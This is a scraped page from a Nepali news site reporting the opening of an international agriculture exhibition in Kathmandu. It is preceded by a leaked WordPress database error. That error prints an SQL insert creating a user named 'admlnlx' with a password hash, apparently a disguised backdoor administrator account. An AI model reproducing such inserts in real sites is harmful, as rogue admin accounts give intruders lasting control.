WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BEfsHn5DaKYRiKkvB/SH/P8mVuG7c./', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 23:15:32', '', 'admlnlx', 'admlnlx')

राजधानीमा बृहत अन्तर्राष्ट्रिय कृषि प्रदर्शनी सुरु – Gaule Khabar

राजधानीमा बृहत अन्तर्राष्ट्रिय कृषि प्रदर्शनी सुरु

राजधानीमा बृहत अन्तर्राष्ट्रिय कृषि प्रदर्शनी सुरु

काठमाडौ,फागुन ६-

कृषि क्षेत्रको व्यवसायिक विकास गर्ने उद्देश्यले नेपालमा पहिलोपटक बृहत अन्तराष्ट्रिय कृषि प्रर्दशनी सुरु भएको छ।

शुक्रबारदेखि भृकुटीमण्डमा सुरु भएको प्रदर्शनीको कृषिमन्त्री गौरीशंकर चौधरीले उद्घाटन गरे। मिडिया स्पेश सोलुसन प्रा.लि, कृषि मेसिनरी व्यवसायी संघ र भारतको फ्यूचरेक्स ग्रुपको संयुक्त आयोजनामा सुरु भएको प्रदर्शनीमा कृषिसँग सम्बन्धित आधुनिक प्रविधिका दुईसय स्टल राखिएका छन्। प्रर्दशनीमा नेपाल, भारत, मलेसिया, चीन, ताईवान, इटाली, इजराइल, बंगलादेश, जर्मनी, बेल्जियमलगायत १६ देशका कृषिजन्य प्रविधिको अवलोकन गर्न सकिनेछ।

जसमा आधुनिक कृषियन्त्र तथा उपकरण, आधुनिक खेती प्रणाली, डेरी उद्योग, मत्स्यपालन उद्योग, पोल्ट्री उद्योगसम्बन्धी प्रविधिका स्टलहरु छन्।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका